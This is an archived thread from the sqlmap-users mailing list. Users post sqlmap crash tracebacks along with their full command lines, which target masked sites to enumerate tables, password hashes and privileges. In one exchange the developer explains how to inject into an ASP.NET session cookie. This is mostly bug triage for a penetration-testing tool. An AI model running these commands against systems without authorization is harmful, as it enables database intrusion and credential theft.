Please discard my last report...it was my mistake... :(( 2011/8/9 machak machakowitz <mma...@gm...> > > > C:\Users\Giga\Desktop\sqlmap1> sqlmap.py -u "http://***************************.php?show=galleries&gallery=252§ion=8" > --auth-type=basic --auth-cred "*****:****" --dbm > s=mysql -o --random-agent -D ****** -T users --columns > > sqlmap/1.0-dev (r4332) - automatic SQL injection and database takeover tool > http://www.sqlmap.org > > [!] legal disclaimer: usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state a > nd federal laws. Authors assume no liability and are not responsible for > any misuse or damage caused by this program > > [*] starting at 14:18:33 > > [14:18:33] [INFO] fetched random HTTP User-Agent header from file > 'C:\Users\Giga\Desktop\sqlmap1\txt\user-agents.txt': Opera/9.80 (X11; Linux > i686; U; ru) Presto/2.2.15 Versi > on/10.00 > [14:18:33] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been > disabled because of it's incompatibility with authentication methods > [14:18:33] [INFO] using > 'C:\Users\Giga\Desktop\sqlmap1\output\*****************\session' as session > file > [14:18:33] [INFO] testing connection to the target url > [14:18:34] [INFO] heuristics detected web page charset 'ascii' > [14:18:34] [WARNING] there is a DBMS error found in the HTTP response > bodywhich could interfere with the results of the tests > [14:18:34] [INFO] testing NULL connection to the target url > > [14:18:34] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4332), retry > your run with the latest development version from the Subversion repository. > If the exception persi > sts, please send by e-mail to ********************************** the > following text and any information required to reproduce the bug. The > developers will try to reproduce th > e bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4332) > Python version: 2.7.1 > Operating system: nt > Command line: C:\Users\Giga\Desktop\sqlmap1\sqlmap.py -u > *************************************************************************** > --auth-type=basic --auth-cred *********** > *** --dbms=mysql -o --random-agent -D ******** -T ***** --columns > Technique: None > Back-end DBMS: MySQL (identified) > Traceback (most recent call last): > File "C:\Users\Giga\Desktop\sqlmap1\sqlmap.py", line 86, in main > start() > File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\controller.py", line > 334, in start > checkNullConnection() > File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\checks.py", line 900, in > checkNullConnection > page, headers = Request.getPage(method=HTTPMETHOD.HEAD) > File "C:\Users\Giga\Desktop\sqlmap1\lib\request\connect.py", line 281, in > getPage > conn = urllib2.urlopen(req) > File "C:\Python27\lib\urllib2.py", line 126, in urlopen > return _opener.open(url, data, timeout) > File "C:\Python27\lib\urllib2.py", line 392, in open > response = self._open(req, data) > File "C:\Python27\lib\urllib2.py", line 410, in _open > '_open', req) > File "C:\Python27\lib\urllib2.py", line 370, in _call_chain > result = func(*args) > File "C:\Python27\lib\urllib2.py", line 1186, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "C:\Python27\lib\urllib2.py", line 1155, in do_open > h.request(req.get_method(), req.get_selector(), req.data, headers) > File "C:\Python27\lib\httplib.py", line 941, in request > self._send_request(method, url, body, headers) > File "C:\Python27\lib\httplib.py", line 975, in _send_request > self.endheaders(body) > File "C:\Python27\lib\httplib.py", line 937, in endheaders > self._send_output(message_body) > File "C:\Python27\lib\httplib.py", line 797, in _send_output > self.send(msg) > File "C:\Python27\lib\httplib.py", line 773, in send > self.sock.sendall(data) > File "C:\Python27\lib\socket.py", line 224, in meth > return getattr(self._sock,name)(*args) > UnicodeEncodeError: 'ascii' codec can't encode character u'\xa7' in > position 44: ordinal not in range(128) > > [*] shutting down at 14:18:34 > > > C:\Users\Giga\Desktop\sqlmap1> > > Don't know why is email for reporting bugs also hidden... > > > > |
From: machak m. <mma...@gm...> - 2011-08-09 12:31:46
|
C:\Users\Giga\Desktop\sqlmap1> sqlmap.py -u "http://***************************.php?show=galleries&gallery=252§ion=8" --auth-type=basic --auth-cred "*****:****" --dbm s=mysql -o --random-agent -D ****** -T users --columns sqlmap/1.0-dev (r4332) - automatic SQL injection and database takeover tool http://www.sqlmap.org [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state a nd federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 14:18:33 [14:18:33] [INFO] fetched random HTTP User-Agent header from file 'C:\Users\Giga\Desktop\sqlmap1\txt\user-agents.txt': Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Versi on/10.00 [14:18:33] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of it's incompatibility with authentication methods [14:18:33] [INFO] using 'C:\Users\Giga\Desktop\sqlmap1\output\*****************\session' as session file [14:18:33] [INFO] testing connection to the target url [14:18:34] [INFO] heuristics detected web page charset 'ascii' [14:18:34] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests [14:18:34] [INFO] testing NULL connection to the target url [14:18:34] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4332), retry your run with the latest development version from the Subversion repository. If the exception persi sts, please send by e-mail to ********************************** the following text and any information required to reproduce the bug. The developers will try to reproduce th e bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r4332) Python version: 2.7.1 Operating system: nt Command line: C:\Users\Giga\Desktop\sqlmap1\sqlmap.py -u *************************************************************************** --auth-type=basic --auth-cred *********** *** --dbms=mysql -o --random-agent -D ******** -T ***** --columns Technique: None Back-end DBMS: MySQL (identified) Traceback (most recent call last): File "C:\Users\Giga\Desktop\sqlmap1\sqlmap.py", line 86, in main start() File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\controller.py", line 334, in start checkNullConnection() File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\checks.py", line 900, in checkNullConnection page, headers = Request.getPage(method=HTTPMETHOD.HEAD) File "C:\Users\Giga\Desktop\sqlmap1\lib\request\connect.py", line 281, in getPage conn = urllib2.urlopen(req) File "C:\Python27\lib\urllib2.py", line 126, in urlopen return _opener.open(url, data, timeout) File "C:\Python27\lib\urllib2.py", line 392, in open response = self._open(req, data) File "C:\Python27\lib\urllib2.py", line 410, in _open '_open', req) File "C:\Python27\lib\urllib2.py", line 370, in _call_chain result = func(*args) File "C:\Python27\lib\urllib2.py", line 1186, in http_open return self.do_open(httplib.HTTPConnection, req) File "C:\Python27\lib\urllib2.py", line 1155, in do_open h.request(req.get_method(), req.get_selector(), req.data, headers) File "C:\Python27\lib\httplib.py", line 941, in request self._send_request(method, url, body, headers) File "C:\Python27\lib\httplib.py", line 975, in _send_request self.endheaders(body) File "C:\Python27\lib\httplib.py", line 937, in endheaders self._send_output(message_body) File "C:\Python27\lib\httplib.py", line 797, in _send_output self.send(msg) File "C:\Python27\lib\httplib.py", line 773, in send self.sock.sendall(data) File "C:\Python27\lib\socket.py", line 224, in meth return getattr(self._sock,name)(*args) UnicodeEncodeError: 'ascii' codec can't encode character u'\xa7' in position 44: ordinal not in range(128) [*] shutting down at 14:18:34 C:\Users\Giga\Desktop\sqlmap1> Don't know why is email for reporting bugs also hidden... |
From: John C. <jo...@no...> - 2011-08-08 07:25:06
|
[23:07:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4332), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r4332) Python version: 2.7.1+ Operating system: posix Command line: ./sqlmap.py --tor --user-agent=PenTest --threads 4 --users --passwords --privileges -u *********** Technique: TIME Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "./sqlmap.py", line 86, in main start() File "/opt/sqlmap/lib/controller/controller.py", line 561, in start action() File "/opt/sqlmap/lib/controller/action.py", line 77, in action conf.dbmsHandler.getPasswordHashes(), "password hash") File "/opt/sqlmap/plugins/generic/enumeration.py", line 287, in getPasswordHashes for user, password in value: ValueError: need more than 1 value to unpack [*] shutting down at 23:07:56 |
From: Miroslav S. <mir...@gm...> - 2011-08-03 09:04:59
|
hi. fixed and committed. thank you for your report. kr 2011/8/3 anonymous anonymous <tm...@2c...>: > [01:06:54] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4324), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4324) > Python version: 2.6.6 > Operating system: posix > Command line: ./sqlmap.py -u > ********************************************************** --threads 50 > --union-cols=56 --technique=U -T *** --search > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/root/sqlmap/lib/controller/controller.py", line 555, in start > action() > File "/root/sqlmap/lib/controller/action.py", line 115, in action > conf.dbmsHandler.search() > File "/root/sqlmap/plugins/generic/enumeration.py", line 2340, in search > conf.dumper.dbTables(self.searchTable()) > File "/root/sqlmap/plugins/generic/enumeration.py", line 2038, in > searchTable > for foundDb, foundTbl in values: > ValueError: need more than 0 values to unpack > [*] shutting down at 01:06:54 > ------------------------------------------------------------------------------ > BlackBerry® DevCon Americas, Oct. 18-20, San Francisco, CA > The must-attend event for mobile developers. Connect with experts. > Get tools for creating Super Apps. See the latest technologies. > Sessions, hands-on labs, demos & much more. Register early & save! > http://p.sf.net/sfu/rim-blackberry-1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
From: anonymous a. <tm...@2c...> - 2011-08-02 23:23:26
|
<div><div>[01:06:54] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4324), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.</div><div>sqlmap version: 1.0-dev (r4324)</div><div>Python version: 2.6.6</div><div>Operating system: posix</div><div>Command line: ./sqlmap.py -u ********************************************************** --threads 50 --union-cols=56 --technique=U -T *** --search</div><div>Technique: UNION</div><div>Back-end DBMS: MySQL (fingerprinted)</div><div>Traceback (most recent call last):</div><div> File "./sqlmap.py", line 86, in main</div><div> start()</div><div> File "/root/sqlmap/lib/controller/controller.py", line 555, in start</div><div> action()</div><div> File "/root/sqlmap/lib/controller/action.py", line 115, in action</div><div> conf.dbmsHandler.search()</div><div> File "/root/sqlmap/plugins/generic/enumeration.py", line 2340, in search</div><div> conf.dumper.dbTables(self.searchTable())</div><div> File "/root/sqlmap/plugins/generic/enumeration.py", line 2038, in searchTable</div><div> for foundDb, foundTbl in values:</div><div>ValueError: need more than 0 values to unpack</div><div>[*] shutting down at 01:06:54</div></div> |
From: Robin W. <ro...@di...> - 2011-08-02 17:54:25
|
On 2 August 2011 18:30, Miroslav Stampar <mir...@gm...> wrote: > hi Robin > > you'll need to give a valid Cookie with > --cookie="....&ASP.NET_SessionId=1FA...&..." and use -p > "ASP.NET_SessionId" > > thing is that when level < 4 we ignore session-like parameters in > default cases. so, either you can use explicit -p "ASP.NET_SessionId" > or you can use --level=4. in your case i would suggest usage of -p. > > kr Thanks, I'll give that a try. Robin > On Tue, Aug 2, 2011 at 2:41 PM, Robin Wood <ro...@di...> wrote: >> Hi >> I've got an application that is vulnerable to SQLi in one of two >> cookie parameters. The one that is injectable is the ASP.NET_SessionId >> which has to start with a valid session id but then if given an extra >> ' on the end it fails and dumps out a nice SQL error. >> >> So what I need to do is to tell sqlmap to inject onto the end of the >> one cookie but leave the other intact. Is this possible? >> >> Robin >> >> ------------------------------------------------------------------------------ >> BlackBerry® DevCon Americas, Oct. 18-20, San Francisco, CA >> The must-attend event for mobile developers. Connect with experts. >> Get tools for creating Super Apps. See the latest technologies. >> Sessions, hands-on labs, demos & much more. Register early & save! >> http://p.sf.net/sfu/rim-blackberry-1 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > |
From: Miroslav S. <mir...@gm...> - 2011-08-02 17:31:02
|
hi Robin you'll need to give a valid Cookie with --cookie="....&ASP.NET_SessionId=1FA...&..." and use -p "ASP.NET_SessionId" thing is that when level < 4 we ignore session-like parameters in default cases. so, either you can use explicit -p "ASP.NET_SessionId" or you can use --level=4. in your case i would suggest usage of -p. kr On Tue, Aug 2, 2011 at 2:41 PM, Robin Wood <ro...@di...> wrote: > Hi > I've got an application that is vulnerable to SQLi in one of two > cookie parameters. The one that is injectable is the ASP.NET_SessionId > which has to start with a valid session id but then if given an extra > ' on the end it fails and dumps out a nice SQL error. > > So what I need to do is to tell sqlmap to inject onto the end of the > one cookie but leave the other intact. Is this possible? > > Robin > > ------------------------------------------------------------------------------ > BlackBerry® DevCon Americas, Oct. 18-20, San Francisco, CA > The must-attend event for mobile developers. Connect with experts. > Get tools for creating Super Apps. See the latest technologies. > Sessions, hands-on labs, demos & much more. Register early & save! > http://p.sf.net/sfu/rim-blackberry-1 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |